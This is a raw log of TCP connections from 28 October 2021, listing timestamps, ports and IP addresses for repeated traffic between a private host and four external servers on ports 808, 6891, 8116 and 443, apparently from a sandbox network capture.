Oct 28, 2021 05:26:49.943363905 CEST	49815	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:49.943420887 CEST	49815	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:49.946533918 CEST	49815	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:50.038831949 CEST	6891	49816	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:50.038857937 CEST	6891	49816	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:50.039031982 CEST	49816	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:50.039063931 CEST	49816	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:50.046663046 CEST	49816	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:50.081099987 CEST	49817	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:50.109611034 CEST	808	49815	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:50.169570923 CEST	49818	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:50.212666035 CEST	6891	49816	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:50.218065977 CEST	8116	49818	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:50.218276978 CEST	49818	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:50.218813896 CEST	49818	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:50.247312069 CEST	6891	49817	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:50.247487068 CEST	49817	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:50.248089075 CEST	49817	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:50.267165899 CEST	8116	49818	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:50.267317057 CEST	8116	49818	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:50.267446995 CEST	49818	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:50.267959118 CEST	49818	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:50.272993088 CEST	49818	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:50.273192883 CEST	49818	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:50.321485996 CEST	8116	49818	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:50.321513891 CEST	8116	49818	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:50.322263956 CEST	8116	49818	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:50.414094925 CEST	6891	49817	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:50.414125919 CEST	6891	49817	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:50.414818048 CEST	49817	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:50.415493011 CEST	49817	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:50.420591116 CEST	49817	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:50.420717001 CEST	49817	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:50.491703987 CEST	8116	49818	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:50.491736889 CEST	8116	49818	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:50.491864920 CEST	49818	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:50.502650976 CEST	49818	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:50.551079035 CEST	8116	49818	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:50.586673021 CEST	6891	49817	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:50.586704016 CEST	6891	49817	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:50.668955088 CEST	49819	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:50.668991089 CEST	443	49819	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:50.669111013 CEST	49819	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:50.670109034 CEST	49819	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:50.670137882 CEST	443	49819	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:50.964678049 CEST	6891	49817	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:50.964713097 CEST	6891	49817	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:50.964776039 CEST	49817	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:50.964807034 CEST	49817	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:50.968071938 CEST	49817	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:51.090192080 CEST	49820	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:51.134268045 CEST	6891	49817	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:51.141846895 CEST	8116	49820	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:51.141964912 CEST	49820	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:51.142637968 CEST	49820	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:51.168492079 CEST	443	49819	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:51.168565035 CEST	49819	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:51.169151068 CEST	49819	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:51.169166088 CEST	443	49819	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:51.174858093 CEST	49819	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:51.174880981 CEST	443	49819	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:51.174969912 CEST	49819	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:51.174982071 CEST	443	49819	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:51.194106102 CEST	8116	49820	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:51.194397926 CEST	8116	49820	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:51.194478035 CEST	49820	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:51.195005894 CEST	49820	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:51.200079918 CEST	49820	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:51.200206995 CEST	49820	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:51.251526117 CEST	8116	49820	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:51.252228022 CEST	8116	49820	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:51.436805964 CEST	8116	49820	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:51.436832905 CEST	8116	49820	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:51.436903954 CEST	49820	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:51.436939001 CEST	49820	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:51.439621925 CEST	49820	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:51.491065025 CEST	8116	49820	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:51.562680960 CEST	49821	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:51.562733889 CEST	443	49821	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:51.562823057 CEST	49821	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:51.563652992 CEST	49821	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:51.563673019 CEST	443	49821	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:51.868936062 CEST	443	49819	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:51.869014978 CEST	443	49819	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:51.869087934 CEST	49819	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:51.869106054 CEST	49819	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:51.874588013 CEST	49819	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:51.874630928 CEST	443	49819	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:51.997785091 CEST	49822	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:52.078244925 CEST	443	49821	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:52.080929995 CEST	49821	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:52.081643105 CEST	49821	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:52.081661940 CEST	443	49821	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:52.087897062 CEST	49821	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:52.087922096 CEST	443	49821	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:52.088203907 CEST	49821	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:52.088219881 CEST	443	49821	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:52.157593966 CEST	808	49822	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:52.157804012 CEST	49822	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:52.158593893 CEST	49822	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:52.318172932 CEST	808	49822	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:52.318376064 CEST	808	49822	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:52.318471909 CEST	49822	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:52.318955898 CEST	49822	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:52.324266911 CEST	49822	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:52.324371099 CEST	49822	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:52.478513002 CEST	808	49822	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:52.483908892 CEST	808	49822	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:52.483948946 CEST	808	49822	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:52.483968019 CEST	808	49822	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:52.483983994 CEST	808	49822	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:52.789223909 CEST	443	49821	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:52.789302111 CEST	443	49821	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:52.789463043 CEST	49821	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:52.793313980 CEST	49821	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:52.793329954 CEST	443	49821	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:52.866075039 CEST	808	49822	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:52.866102934 CEST	808	49822	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:52.866336107 CEST	49822	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:52.866411924 CEST	49822	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:52.880198956 CEST	49822	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:52.954849005 CEST	49823	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:52.997677088 CEST	49824	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:53.039889097 CEST	808	49822	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:53.120390892 CEST	808	49823	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:53.120486975 CEST	49823	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:53.121198893 CEST	49823	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:53.163980007 CEST	6891	49824	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:53.164098978 CEST	49824	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:53.164980888 CEST	49824	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:53.286638021 CEST	808	49823	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:53.286732912 CEST	808	49823	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:53.286853075 CEST	49823	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:53.287331104 CEST	49823	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:53.291280031 CEST	49823	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:53.291543007 CEST	49823	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:53.330862045 CEST	6891	49824	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:53.330992937 CEST	6891	49824	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:53.331123114 CEST	49824	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:53.331609011 CEST	49824	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:53.336153030 CEST	49824	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:53.336287975 CEST	49824	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:53.452949047 CEST	808	49823	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:53.458050966 CEST	808	49823	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:53.458086014 CEST	808	49823	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:53.502067089 CEST	6891	49824	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:53.502095938 CEST	6891	49824	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:53.838300943 CEST	808	49823	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:53.838347912 CEST	808	49823	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:53.838452101 CEST	49823	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:53.841614008 CEST	49823	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:53.895277977 CEST	6891	49824	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:53.895320892 CEST	6891	49824	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:53.895428896 CEST	49824	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:53.895479918 CEST	49824	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:53.903518915 CEST	49824	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:53.964946032 CEST	49825	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:54.007092953 CEST	808	49823	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:54.013461113 CEST	49826	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:54.060760021 CEST	8116	49826	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:54.060877085 CEST	49826	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:54.061661959 CEST	49826	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:54.069564104 CEST	6891	49824	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:54.108668089 CEST	8116	49826	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:54.108997107 CEST	8116	49826	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:54.109086037 CEST	49826	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:54.115741014 CEST	49826	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:54.120806932 CEST	49826	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:54.120970011 CEST	49826	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:54.131171942 CEST	6891	49825	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:54.131268024 CEST	49825	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:54.132225037 CEST	49825	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:54.168363094 CEST	8116	49826	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:54.168385029 CEST	8116	49826	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:54.298293114 CEST	6891	49825	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:54.298429012 CEST	6891	49825	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:54.298614025 CEST	49825	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:54.299051046 CEST	49825	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:54.302934885 CEST	49825	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:54.303023100 CEST	49825	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:54.360595942 CEST	8116	49826	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:54.360637903 CEST	8116	49826	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:54.360709906 CEST	49826	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:54.367955923 CEST	49826	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:54.415024042 CEST	8116	49826	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:54.469130039 CEST	6891	49825	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:54.469152927 CEST	6891	49825	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:54.497142076 CEST	49827	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:54.497180939 CEST	443	49827	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:54.497351885 CEST	49827	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:54.498049974 CEST	49827	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:54.498065948 CEST	443	49827	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:54.847980976 CEST	6891	49825	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:54.848018885 CEST	6891	49825	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:54.848128080 CEST	49825	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:54.850224018 CEST	49825	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:54.971652985 CEST	49828	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:54.987303019 CEST	443	49827	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:54.988209009 CEST	49827	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:54.988872051 CEST	49827	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:54.988883018 CEST	443	49827	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:54.995827913 CEST	49827	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:54.995845079 CEST	443	49827	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:54.995980978 CEST	49827	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:54.995990992 CEST	443	49827	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:55.016278982 CEST	6891	49825	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:55.020095110 CEST	8116	49828	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:55.020272017 CEST	49828	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:55.020999908 CEST	49828	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:55.069297075 CEST	8116	49828	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:55.069555998 CEST	8116	49828	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:55.069684029 CEST	49828	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:55.070293903 CEST	49828	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:55.075705051 CEST	49828	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:55.075959921 CEST	49828	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:55.124012947 CEST	8116	49828	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:55.124162912 CEST	8116	49828	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:55.164912939 CEST	8116	49828	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:55.293751001 CEST	8116	49828	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:55.293775082 CEST	8116	49828	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:55.293883085 CEST	49828	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:55.300621986 CEST	49828	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:55.348886013 CEST	8116	49828	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:55.431538105 CEST	49829	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:55.431581020 CEST	443	49829	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:55.431694031 CEST	49829	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:55.432579041 CEST	49829	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:55.432599068 CEST	443	49829	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:55.687143087 CEST	443	49827	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:55.687206030 CEST	443	49827	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:55.687239885 CEST	49827	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:55.687278032 CEST	49827	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:55.692795992 CEST	49827	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:55.692827940 CEST	443	49827	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:55.875616074 CEST	49830	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:55.950973988 CEST	443	49829	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:55.952080011 CEST	49829	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:55.952958107 CEST	49829	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:55.952975988 CEST	443	49829	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:55.959148884 CEST	49829	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:55.959160089 CEST	443	49829	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:55.959441900 CEST	49829	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:55.959459066 CEST	443	49829	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:56.039871931 CEST	808	49830	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:56.042232990 CEST	49830	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:56.043019056 CEST	49830	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:56.207390070 CEST	808	49830	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:56.207412958 CEST	808	49830	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:56.207499981 CEST	49830	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:56.208173990 CEST	49830	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:56.213586092 CEST	49830	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:56.213730097 CEST	49830	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:56.372082949 CEST	808	49830	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:56.377515078 CEST	808	49830	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:56.377567053 CEST	808	49830	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:56.377686024 CEST	808	49830	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:56.668261051 CEST	443	49829	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:56.668327093 CEST	49829	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:56.668330908 CEST	443	49829	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:56.668378115 CEST	49829	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:56.670702934 CEST	49829	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:56.670727968 CEST	443	49829	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:56.755608082 CEST	808	49830	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:56.755637884 CEST	808	49830	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:56.755698919 CEST	49830	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:56.755724907 CEST	49830	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:56.761603117 CEST	49830	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:56.843741894 CEST	49832	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:56.871956110 CEST	49833	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:56.925601006 CEST	808	49830	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:57.001893997 CEST	808	49832	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:57.002007008 CEST	49832	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:57.002569914 CEST	49832	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:57.038218021 CEST	6891	49833	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:57.038325071 CEST	49833	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:57.038794994 CEST	49833	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:57.161627054 CEST	808	49832	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:57.161663055 CEST	808	49832	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:57.161807060 CEST	49832	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:57.162170887 CEST	49832	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:57.166507959 CEST	49832	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:57.166598082 CEST	49832	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:57.205029964 CEST	6891	49833	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:57.205063105 CEST	6891	49833	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:57.205149889 CEST	49833	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:57.205661058 CEST	49833	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:57.210150957 CEST	49833	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:57.210273027 CEST	49833	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:57.320096016 CEST	808	49832	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:57.324547052 CEST	808	49832	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:57.324577093 CEST	808	49832	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:57.324584007 CEST	808	49832	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:57.324600935 CEST	808	49832	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:57.376185894 CEST	6891	49833	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:57.376266956 CEST	6891	49833	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:57.376286030 CEST	6891	49833	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:57.705985069 CEST	808	49832	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:57.706029892 CEST	808	49832	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:57.706079960 CEST	49832	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:57.706136942 CEST	49832	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:57.708990097 CEST	49832	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:57.761502028 CEST	6891	49833	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:57.761543989 CEST	6891	49833	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:57.761684895 CEST	49833	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:57.769390106 CEST	49833	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:57.833961964 CEST	49835	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:57.867008924 CEST	808	49832	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:57.903927088 CEST	49836	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:57.935594082 CEST	6891	49833	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:57.957539082 CEST	8116	49836	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:57.957668066 CEST	49836	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:57.958408117 CEST	49836	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:58.000292063 CEST	6891	49835	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:58.000560045 CEST	49835	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:58.001434088 CEST	49835	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:58.011847973 CEST	8116	49836	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:58.011950016 CEST	8116	49836	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:58.012520075 CEST	49836	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:58.013134956 CEST	49836	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:58.024805069 CEST	49836	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:58.025012016 CEST	49836	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:58.078449011 CEST	8116	49836	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:58.079020977 CEST	8116	49836	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:58.167586088 CEST	6891	49835	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:58.167614937 CEST	6891	49835	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:58.167756081 CEST	49835	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:58.168371916 CEST	49835	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:58.173093081 CEST	49835	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:58.173238993 CEST	49835	6891	192.168.2.3	45.77.0.96
